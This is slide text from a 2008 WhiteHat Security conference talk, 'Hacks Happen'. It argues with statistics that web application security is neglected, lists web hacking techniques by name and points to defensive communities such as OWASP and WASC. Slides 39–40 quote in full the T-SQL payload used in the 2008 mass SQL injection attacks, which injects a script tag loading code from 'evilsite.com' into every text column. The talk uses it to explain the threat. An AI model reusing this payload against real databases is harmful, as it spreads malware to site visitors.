© 2008 WhiteHat Security, Inc.
Hacks Happen
Jeremiah GrossmanWhiteHat Security founder & CTO blog: http://jeremiahgrossman.blogspot.com/email: [email protected]
1
0wN3d!!12
2
Don’t write your own crypto algorithmsDon’t run web servers as rootUse Secure Sockets Layer (SSL)Have proper file system permissions
Wait, how does this make a website secure?
1998’ best practices
3
3
What’s input validation?
4
4
Probably Cross-Site Scripting
6
6
Will hack for T-Shirt :)
7
7
I made $14 an hour
8
8
Job Description: Hack Everything!
Official Title“the hacker yahoo”
9
9
...and play foosball
10
10
11
11
...No articles...
...No white papers...
...No methodologies...
NOTHING!12
12
...except for a hacker named rain.forest.puppy writing about an obscure attack called SQL Injection.
13How I hacked PacketStormhttp://packetstormsecurity.nl/0002-exploits/rfp2k01.txt
13
Protect this website and the ~599 others
Find the vulnerabilities before the bad guys
14
14
Job security
15
15
16
16
17
Web Application Security Consortiumhttp://www.webappsec.org
Open Web Application Security Projecthttp://www.owasp.org//
17
“ There is no "secure development lifecycle" in the vast majority of universities' degree programs - that is, security is not "baked into" graduates of relevant programs (e.g., computer science) throughout their degree programs. And that is a problem, perhaps the problem plaguing the software industry.”
Mary Ann DavidsonChief Security Officer at Oracle
18The Supply Chain Problemhttp://blogs.oracle.com/maryanndavidson/2008/04/08#a286
18
17 million programmers
worldwideWriting 6,000 lines of code per year (each)
19
17 million programmers worldwidehttp://www.itjungle.com/tlb/tlb011607-story06.htmlhttp://deepfreeze9.blogspot.com/2007/08/factoid-19-million-programmers-by-2010.htmlhttp://blogs.zdnet.com/ITFacts/?p=12808
U.S. Department of Labor Bureau of Labor Statistics - Computer Programmershttp://www.bls.gov/oco/ocos110.htm
~6 KLOC per year per developerhttp://blogs.msdn.com/philipsu/archive/2006/06/14/631438.aspxhttp://fixunix.com/linux/370267-attackers-hose-down-microsoft-s-jet-db-engine-5.htmlhttp://blogs.msdn.com/eldar/archive/2006/07/07/647858.aspx
19
Windows 2000 29 MillionRed Hat Linux 7.1 30 Million
Windows XP 40 MillionWindows Vista 50 MillionMac OS X 10.4 86 Million
= 102 BillionNew lines of code pushed per year
20Source lines of codehttp://en.wikipedia.org/wiki/Source_lines_of_code
20
Conservative research says: 1 security defect for every 10,000 lines of code
211 vulnerability per 10 KLOChttp://www.informationweek.com/story/showArticle.jhtml?articleID=205600229&cid=RSSfeed_IWK_Allhttp://www.pcworld.com/businesscenter/article/141226/open_source_security_bugs_uncovered.html
21
(potentially) newundiscoveredvulnerabilities
850,000 per month 28,000 per day
10,200,000per year
22
22
In 2007 IBM X-force reported vulnerabilities 6,437
Total vulnerabilities EVER reported in National Vulnerability Database CVE Publication rate: 16 vulnerabilities / day
32,000
IBM Internet Security Systems X-Force 2007 Trend Statisticshttp://www-935.ibm.com/services/us/iss/pdf/etr_xforce-2007-annual-report.pdf
National Vulnerability Databasehttp://nvd.nist.gov/
23
If only 1% of new undiscovered vulnerabilities are exploitable:
102,000zero-days per year
24
24
Location of the other ~95,000 zero-days:
unknown25
25
172,000,000 websites
millions more added per month
26June 2008 Web Server Surveyhttp://news.netcraft.com/archives/2008/06/22/june_2008_web_server_survey.html
26
809,000 websites use SSL
protecting password, credit card numbers, social security numbers, and
our email (if we’re lucky).
27Extended Validation SSL Certificates now 1 Year Oldhttp://news.netcraft.com/archives/2008/02/17/extended_validation_ssl_certificates_now_1_year_old.html
27
9 out of 10 websites have vulnerabilities
allowing hackers unauthorized access
28
WhiteHat Security Website Security Statistics Report (March)https://whitehatsec.market2lead.com/go/whitehatsec/stats0308
“A 2007 report from NTA Monitor found that 90 percent of UK-based company websites harboured at least one weakness that could allow hackers to gain unauthorised access.”http://www.continuitycentral.com/feature0555.htm
70% of websites at immediate risk of being hacked!http://www.acunetix.com/news/security-audit-results.htm
http://www.heise-online.co.uk/news/Every-second-web-application-contains-between-one-and-ten-holes--/110515http://www.symantec.com/business/theme.jsp?themeid=threatreport
28
hacked
29
29
If there’s just 1 vulnerability on 90% of the SSL websites...Other reports say an average of 7
728,100 total vulnerabilities
30WhiteHat Security Website Security Statistics Report (March)https://whitehatsec.market2lead.com/go/whitehatsec/stats0308
30
XSSed.com has reported:
20,843 total vulnerabilities
1,072 fixed (5%)
31http://www.xssed.com/
31
“SSL is like using an armored truck to transport rolls of pennies between someone on a park bench and someone doing business from a cardboard box.”Eugene H. Spafford, Professor Purdue University - 2002
“[Application security] is one of the most serious and oftenoverlooked risks facing government and commercial organizations. The root cause of these risks is not flawed software, but software development processes that pay little or no attention to security."Jeff Williams, OWASP Chair - 2003
“The reason is that bad software lies at the heart of all computer security problems, and more and more bad software is being produced. Traditional solutions simply treat the symptoms, not the problem, and usually do so in a reactive way.”Gary McGraw, CTO of Cigital - 2001
3232
A new infected Web page is discovered every:5 seconds 24 hours a day365 days a year
Over 79% of websites hosting malicious code are legitimate(compromised by attackers)
33Sophos: One Web page infected every five secondshttp://news.zdnet.com/2424-1009_22-198647.html
33
2006, 0.3% of all Internet queries return at least one URL containing malicious content.
2007 - 1.3%
2008 - ?
34How Unsecure Is The Web?http://blogs.forrester.com/srm/2008/03/how-unsecure-is.html
34
35
35
Kraken400,000 infected computers
Srizbi315,000 infected computers
Storm200,000 infected computers
2nd generation malware
36Vint Cerf: one quarter of all computers part of a botnethttp://arstechnica.com/news.ars/post/20070125-8707.html
36
37http://www.fbi.gov/cyberinvest/protect_online.htm
37
38
38
1. Google recon for weak websites (*.asp, *.php)2. Generic SQL Injection populates databases with malicious JavaScript IFRAMEs.3. Visitors arrive (U.N., DHS, etc.) and their browser auto-connects to a malware server infecting their machine with trojans.4. Botnets form with then continue SQL injecting websites
Mass SQL Injection
39http://blogs.zdnet.com/security/?p=1150http://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines.htmlhttp://blogs.zdnet.com/security/?p=1122http://ddanchev.blogspot.com/2008/04/united-nations-serving-malware.html
39
DECLARE @T varchar(255), @C varchar(255);DECLARE Table_Cursor CURSOR FORSELECT a.name, b.nameFROM sysobjects a, syscolumns bWHERE a.id = b.id AND a.xtype = 'u' AND(b.xtype = 99 ORb.xtype = 35 ORb.xtype = 231 ORb.xtype = 167);OPEN Table_Cursor;FETCH NEXT FROM Table_Cursor INTO @T, @C;WHILE (@@FETCH_STATUS = 0) BEGINEXEC('update [' + @T + '] set [' + @C + '] =rtrim(convert(varchar,[' + @C + ']))+''<script src=http://evilsite.com/1.js></script>''');FETCH NEXT FROM Table_Cursor INTO @T, @C;END;CLOSE Table_Cursor;DEALLOCATE Table_Cursor;
40Skeleton key unlocks Microsoft SQL servers in latest Web attackhttp://www.news.com/8301-10789_3-9938224-57.html
40
China-based online “Password Recovery” services:You pay them to hack into “your” account.
1. 300 Yuan ($43) to break an overseas mailbox password, with 85% probability of success.
2. 200 Yuan ($29) to break a domestic mailbox password, with 90% probability of success. 3. 1000 Yuan ($143) to break a company’s mailbox password (no success rate given).
Also on the menu:passwords for 163, 126, QQ, Yahoo, Sohu, Sina, TOM, Hotmail, MSN…etc.
41http://www.thedarkvisitor.com/2008/04/mailbox-passwords-for-sale-chinese-hacker-business-or-scam/http://news.cnnb.com.cn/system/2008/04/14/005548493.shtml
41
42
Hire to Hack http://www.hire2hack.net/
Variable project-based pricing $150 (USD) minimum. They accept Western Union.
42
Insider: someone with a fiduciary role with a company. A corporate executive, investment banker or attorney.
Not a hacker
43Hacker holds onto ill-gotten gains thanks to US courtshttp://www.theregister.co.uk/2008/02/19/insider_trading_catch22
43
44
44
PayPal or eBay Acct $8Credit cards w/ CCV & exp $25
WMF Exploit $4,000RealPlayer 11 $10,000OS X $10,000 +
15-inch MacBook Pro
0-Days
Windows Vista $50,000
What Microsoft pays for 0-days... $0
$1,000Bank Acct
World-of-Warcraft l-70 Acct $4
Internet Explorer $100,000
http://www.bestsecuritytips.com/news+article.storyid+116.htmhttp://securitywatch.eweek.com/browsers/russian_firm_demos_realplayer_zeroday_exploit.htmlhttp://blogs.technet.com/security/archive/2008/04/10/rsa-2008-keynote-john-thompson.aspxhttp://www.theregister.co.uk/2007/04/20/pwn-2-own_winner/http://www.arnnet.com.au/index.php/id;741896054;pp;2;fp;4194304;fpid;1http://www.letemps.ch/template/economie.asp?page=9&article=228747
45
average window of exposure (before patching) for well-known vulnerabilities
vendors:
55 days
80% of exploits are available within
19 daysof disclosure.
46IBM Internet Security Systems X-Force 2007 Trend Statisticshttp://www-935.ibm.com/services/us/iss/pdf/etr_xforce-2007-annual-report.pdf
46
Percentage likelihood that a website has a particular vulnerability by class
WhiteHat Security Website Security Statistics Report (March)https://whitehatsec.market2lead.com/go/whitehatsec/stats0308
47
Source: Software Security, by Gary McGraw
Security in the SDLC
48
48
Studies indicate that 75% of security breaches are due to flaws in software.
90% of IT security spending is on perimeter security such as firewalls
49
Insanity - Doing the Same Thing Over and Over Again Expecting a Different Resulthttp://blogs.csoonline.com/insanity_doing_the_same_thing_over_and_over_again_expecting_a_different_result
Application security trend report for q4 2007http://www.cenzic.com/pdfs/Cenzic_AppSecTrends_Q4-07.pdf
Facing up to the threat of cyber-crimehttp://www.continuitycentral.com/feature0555.htm
49
50
VA + WAF
50
493,000 in 2005
752,000 in 2006
480,000 in 2007
Website Defacements
~1 defacement every second
51http://www.zone-h.org/content/view/14928/30/
51
52http://www.infoworld.com/article/07/11/26/Another-inconvenient-truth-Al-Gores-Web-site-hacked_1.htmlhttp://news.netcraft.com/archives/2008/04/21/hacker_redirects_barack_obamas_site_to_hillaryclintoncom.htmlhttp://www.scmagazineus.com/XSS-flaw-on-Obama-page-sends-visitors-to-Clinton-site/article/109309/
52
Average Time to Fix in Days
180 270 365
53WhiteHat Security Website Security Statistics Report (March)https://whitehatsec.market2lead.com/go/whitehatsec/stats0308
53
1. Take the website down
2. Revert to an older version of the website/code (if secure)
3. Stay up while exposed
Options after a vulnerability is found, but before we’re able to fix it.
54
54
55Too much code, too few application security specialistshttp://www.regdeveloper.co.uk/2008/05/28/agile_security/
55
Lack of control
Responsible for the security of the Website(s)Justifies resource allocation to the business ownersPromotes security inside the SDLC via policy and education
Network security solutions don’t work for Web applicationsCan’t fix the vulnerabilities without developer involvementDevelopers don’t work for them
IT Security
56
56
Ajax
Silverlight
Flash/Flex
Ruby on Rails
DojoC#
JavaScript
JSON
OpenID
Widgets
SaaS
HTML5Python
J2EE
MooTools
RSS
Social Networks
OpenSocial OpenSocial
Welcome to
Web 2.057
57
Bill rate for a source code reviewer $150 (US)per hour
$25,000 (US)Source code review for the average small to mid-sized website
To cover 10% of the SSL Websites (~80,000) ...
Total man hours 13,360,000
Source code reviewers 6,680
Annual economic burden $2,000,000,000 (US)
58
58
if every 10 seconds...
It would take about 3 years to find all the new vulnerabilities
for just this year.
If all new code is inspectedto find 1 undiscovered
vulnerability every 60 seconds...
We’d never find them all.
59
59
And then we still have to fix the vulnerabilities
Hackers just need to exploit one to get in.
60
60
starting in 2006The DHS spent $300,000 (US) on a project to
find and fix security defects in 180 Open Source projects.
Found 1 security defect per 1,000 lines (not 10,000)
7,826 defects fixed
$38 per vulnerability
By 2012 over 90% of enterprises will use open source
61
Open Source Code Contains Security Holeshttp://www.informationweek.com/news/security/showArticle.jhtml?articleID=205600229&_requestid=87046http://www.pcworld.com/businesscenter/article/141226/open_source_security_bugs_uncovered.html
Gartner: Open source will quietly take overhttp://news.zdnet.co.uk/software/0,1000000121,39379900,00.htm
61
Conservative estimates put the total annual IT security spend in the US at $50 billion and e-crime losses at $100 billion.
We’re losing two dollars for every dollar spent.
62
Facing up to the threat of cyber-crimehttp://www.continuitycentral.com/feature0555.htm
Calculating the Costs of Cyber Crimehttp://blog.washingtonpost.com/securityfix/2007/09/counting_the_cost_of_cyber_cri.html
62
Change does not happen overnight
From: Bill GatesSent: Tuesday, January 15, 2002 5:22 PMTo: Microsoft and Subsidiaries: All FTE
Subject: Trustworthy computing
Secure Code ROIReduce CostsIncreased RevenueLoss AvoidancePolicy Compliance
63
63
The Attack of the TINY URLsBackdooring MP3 FilesBackdooring QuickTime MoviesCSS history hacking with evil marketingI know where you've beenStealing Search Engine Queries with JavaScriptHacking RSS FeedsMX Injection : Capturing and Exploiting Hidden Mail ServersBlind web server fingerprintingJavaScript Port ScanningCSRF with MS WordBackdooring PDF FilesExponential XSS AttacksMalformed URL in Image Tag Fingerprints Internet ExplorerJavaScript Portscanning and bypassing HTTP AuthBruteforcing HTTP Auth in Firefox with JavaScriptBypassing Mozilla Port BlockingHow to defeat digg.comA story that diggs itselfExpect Header Injection Via FlashForging HTTP request headers with FlashCross Domain Leakage With Image SizeEnumerating Through User AccountsWidespread XSS for Google Search ApplianceDetecting States of Authentication With Protected ImagesXSS Fragmentation AttacksPoking new holes with Flash Crossdomain Policy FilesDetecting Privoxy Users and Circumventing ItUsing CSS to De-AnonymizeResponse Splitting Filter EvasionAdultspace XSS Worm
(2006 and 2007) New Web Hacking TechniquesCSS History Stealing Acts As CookieDetecting FireFox ExtensionsStealing User Information Via Automatic Form FillingCircumventing DNS Pinning for XSSNetflix.com XSRF vulnBrowser Port Scanning without JavaScriptWidespread XSS for Google Search ApplianceBypassing Filters With EncodingVariable Width EncodingNetwork Scanning with HTTP without JavaScriptAT&T Hack Highlights Web Site VulnerabilitiesHow to get linked from SlashdotF5 and Acunetix XSS disclosureAnti-DNS Pinning and Circumventing Anti-Anti DNS pinningGoogle plugs phishing holeNikon magazine hit with security breachGovernator HackMetaverse breached: Second Life customer database hackedHostGator: cPanel Security Hole Exploited in Mass HackI know what you've got (Firefox Extensions)ABC News (AU) XSS linking the reporter to Al QaedaAccount Hijackings Force LiveJournal ChangesXanga Hit By Script WormAdvanced Web Attack Techniques using GMailPayPal Security Flaw allows Identity TheftInternet Explorer 7 "mhtml:" Redirection Information DisclosureBypassing of web filters by using ASCIIGoogle Indexes XSSXML Intranet Port ScanningIMAP Vulnerable to XSSSelecting Encoding Methods For XSS Filter Evasion64
64
Anonymizing RFI Attacks Through GoogleGoogle Hacks On Your BehalfGoogle Dorks Strike AgainCross-Site Printing (Printer Spamming)Stealing Pictures with PicasaHScan ReduxISO-8895-1 Vulnerable in Firefox to Null InjectionMITM attack to overwrite addons in FirefoxMicrosoft ASP.NET Request Validation Bypass Vulnerability (POC)Non-Alpha-Non-Digit 3Steal History without JavaScriptPure Java™, Pure Evil™ PopupsGoogle Adsense CSRF holeThere’s an OAK TREE in my blog!?!?!BK for Mayor of Oak Tree ViewGoogle Docs puts Google Users at RiskAll Your Google Docs are Belong To US…Java Applets and DNS RebindingScanning internal Lan with PHP remote file opening.Firefox File Handling WoesFirefoxurl URI Handler FlawBugs in the Browser: Firefox’s DATA URL Scheme VulnerabilityMultiviews Apache, Accept Requests and free listingOptimizing the number of requests in blind SQL injectionBursting Performances in Blind SQL Injection - Take 2 (Bandwidth)Port Scan without JavaScriptFavorites Gone WildLogin Detection without JavaScriptAnti-DNS Pinning ( DNS Rebinding ) : Online DemonstrationUsername Enumeration Timing Attacks (Sensepost)Google GMail E-mail Hijack TechniqueRecursive Request DoSExaggerating Timing Attack Results Via GET FloodingInitiating Probes Against Servers Via Other Servers
Effects of DNS Rebinding On IE’s Trust ZonesPaper on Hacking Intranets Using Websites (Not Web Browsers)More Port Scanning - This Time in FlashHTTP Response Splitting and Data: URI scheme in FirefoxRes:// Protocol Local File EnumerationRes Timing AttackIE6.0 Protocol GuessingIE 7 and Firefox Browsers Digest Authentication Request SplittingHacking Intranets Via Brute ForceHiding JS in Valid ImagesInternet Archiver Port ScannerNoisy Decloaking MethodsCode Execution Through Filenames in UploadsCross Domain Basic Auth Phishing TacticsAdditional Image Bypass on WindowsDetecting users via Authenticated RedirectsPassing Malicious PHP Through getimagesize()Turn Any Page Into a Greasemonkey PopupEnumerate Windows Users In JSAnti-DNS Pinning ( DNS Rebinding ) + Socket in FLASHIframe HTTP PingRead Firefox Settings (PoC)Stealing Mouse Clicks for Banner Fraud(Non-Persistent) Untraceable XSS AttacksInter Protocol ExploitationDetecting Default Browser in IEBypass port blocking in Firefox, Opera and Konqueror.LocalRodeo DetectionImage Names Gone BadIE Sends Local Addresses in Referer HeaderPDF XSS Can Compromise Your MachineUniversal XSS in Adobe’s Acrobat Reader PluginFirefox Popup Blocker Allows Reading Arbitrary Local FilesIE7.0 Detector65
65
overwriting cookies on other people’s domains in Firefox.Embeding SVG That Contains XSS Using Base64 Encoding in FirefoxFirefox Header Redirection JavaScript ExecutionMore URI Stuff… (IE’s Resouce URI)Hacking without 0days: Drive-by JavaGoogle Urchin password theft madnessUsername Enumeration VulnerabilitiesClient-side SQL Injection AttacksContent-Disposition HackingFlash Cookie Object TrackingJava JAR Attacks and FeaturesSevere XSS in Google and Others due to the JAR protocol issuesWeb Mayhem: Firefox’s JAR: Protocol issues (bugzilla)0DAY: QuickTime pwns FirefoxExploiting Second LifeInjecting the script tag into XMLCross-Browser Proxy UnmaskingSpoofing Firefox protected objects
66
Top Ten Web Hacks of 2007 (Official)http://jeremiahgrossman.blogspot.com/2008/01/top-ten-web-hacks-of-2007-official.html
Top 10 Web Hacks of 2006http://jeremiahgrossman.blogspot.com/2006/12/top-10-web-hacks-of-2006.html
66
Website Founded
Amazon 1994
Yahoo 1995
eBay 1995
Bank of America
1997
Google 1998
MySpace 2003
YouTube 2005
Vulnerability Attack
Buffer Overflow 1996
Command Injection
1996
SQL Injection 2004
XSS 2005
Predictable Resource Location
?
HTTP Response Splitting
2005 / ?
CSRF ?
More major websites were launched before significant classes of attack were “well-known”
67
67
The bad guys do
69
69
"Personally, I'd love to see everyone go through an OWASP-based source-code review, but certainly, that's not going to happen."
Bob RussoPCI Standards Council General Manager
Next version of PCI DSS due in Septemberhttp://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1309120,00.html?track=sy160&asrc=RSS_RSS-10_160
70
70
Get Rich or Die Trying"Making Money on The Web, The Black Hat Way"
by Jeremiah Grossman, Arian Evans
71https://www.blackhat.com/html/bh-usa-08/bh-usa-08-schedule.html
71
don’t let them scare you
72
72
73
74
The Good News
74
75
http://www.webappsec.org/
Web Security Mailing List (2,600+ subscribers)Threat Classification (v2 in progress)Statistics (additional vendors coming on board)Web Application Firewall Evaluation Criteria (v2 in progress)Web Hacking Incident DatabaseDistributed Open Proxy Honeypot
75
PCI-DSS 6.6
77
77
78
AppSec ConferencesOWASP ChaptersSANSWASC Meet-Ups
Google Calendar: InfoSec Events in North Americahttps://www.google.com/calendar/embed?src=s7j59ntjl7lbae0517luaa6fk0%40group.calendar.google.com&ctz=America/Los_Angeles
78
79http://metasploit.com/users/hdm/tools/debian-openssl/http://www.theregister.co.uk/2008/05/21/massive_debian_openssl_hangover/http://blogs.zdnet.com/security/?p=1102
79
80
80
For more information visit: www.whitehatsec.com/
Jeremiah Grossman, founder and CTOblog: http://jeremiahgrossman.blogspot.com/email: [email protected]
Thank You
81